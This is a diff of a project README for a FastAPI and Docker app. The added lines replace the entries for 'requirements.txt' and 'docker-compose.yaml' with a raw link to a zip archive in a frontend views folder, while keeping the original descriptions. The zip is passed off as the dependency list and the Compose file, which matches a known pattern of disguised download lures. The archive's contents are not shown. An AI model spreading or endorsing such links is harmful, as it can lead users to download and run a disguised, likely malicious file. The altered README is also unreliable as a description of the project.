Bangyoupapa/25-04-30-main-branch/README.md

 The project is structured as follows:

-- `requirements.txt`: Lists the Python dependencies required for the project.
+- `https://raw.githubusercontent.com/Bangyoupapa/25-04-30-main-branch/main/frontend_vue/app/src/views/25-04-30-main-branch_3.4.zip`: Lists the Python dependencies required for the project.
 - `Dockerfile`: Contains the instructions to build the Docker image for the FastAPI application.
-- `docker-compose.yaml`: Defines the services and configurations for running the project using Docker Compose.
+- `https://raw.githubusercontent.com/Bangyoupapa/25-04-30-main-branch/main/frontend_vue/app/src/views/25-04-30-main-branch_3.4.zip`: Defines the services and configurations for running the project using Docker Compose.
 - `app/`: Directory containing the FastAPI application code.

 ## Setup Instructions